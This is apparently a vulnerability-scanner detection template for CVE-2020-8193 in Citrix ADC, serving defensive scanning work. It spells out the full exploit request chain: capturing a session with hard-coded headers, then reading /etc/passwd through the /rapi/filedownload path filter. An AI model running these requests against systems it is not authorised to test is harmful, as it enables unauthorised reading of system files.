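# Detection template for CVE-2020-8193 (info.name: Citrix ADC LFI).
# Two requests: the first captures a session id from the response headers
# (conclusions/RegexSelect into the named group "sess"); the second runs only
# when that capture is non-empty (conditions/ValueOf) and matches on the
# content returned for the requested file.
id: CVE-2020-8193
single: true
info:
  name: Citrix ADC LFI - CVE-2020-8193
  risk: High

params:
  - root: "{{.BaseURL}}"
  # Hard-coded values sent in the X-NITRO-USER / X-NITRO-PASS headers below.
  - user: "e4LZnjB9"
  - pass: "kRcEnFy6"
  # URL-encoded path used in the second request's "filter=path:" parameter.
  - file: "%2Fetc%2Fpasswd"

requests:
  # get session
  - method: POST
    redirect: false
    url: >-
      {{.root}}//pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: application/xml
      - Accept-Language: en-US,en;q=0.5
      - Content-Type: application/xml
      - X-NITRO-USER: "{{.user}}"
      - X-NITRO-PASS: "{{.pass}}"
    body: |
      <appfwprofile><login></login></appfwprofile>
    # Both conditions must hold: a 406 status and a SESSID cookie in the
    # response headers.
    detections:
      - >-
        StatusCode() == 406 && StringSearch("resHeaders", "SESSID=")
    # Captures the session id as "sess" for use by the next request.
    conclusions:
      - RegexSelect("resHeaders", "SESSID=(?P<sess>([a-zA-Z0-9]+));")

  # pass session from request 1
  - conditions:
      - ValueOf("sess") !== ""
    method: POST
    redirect: false
    url: >-
      {{.root}}//rapi/filedownload?filter=path:{{.file}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: application/xml
      - Accept-Language: en-US,en;q=0.5
      - Content-Type: application/xml
      # Quoted: left unquoted, YAML reads this as a float and the value loses
      # digits before it is rendered into the header.
      - rand_key: "1968033329.1594279178769461"
      # NOTE(review): Accept is listed twice in this request (application/xml
      # above); which value the engine sends, or whether it sends both,
      # depends on how it merges headers — confirm.
      - Accept: "*/*"
      - X-NITRO-USER: "{{.user}}"
      - X-NITRO-PASS: "{{.pass}}"
      # [[.sess]] refers to the value captured by RegexSelect in request 1.
      # NOTE(review): it uses a different delimiter from the {{.param}}
      # references above — presumably run-time substitution of captured
      # values rather than template-time parameters; confirm with the engine.
      - Cookie: SESSID=[[.sess]]; is_cisco_platform=0; startupapp=neo
    body: |
      <clipermission></clipermission>
    # Positive match requires both markers in the response body.
    detections:
      - >-
        StringSearch("body", "root:") && StringSearch("body", "bin/bash")

reference:
  - links:
      - https://dmaasland.github.io/posts/citrix.html
      - https://support.citrix.com/article/CTX276688
      - https://www.cvebase.com/cve/2020/8193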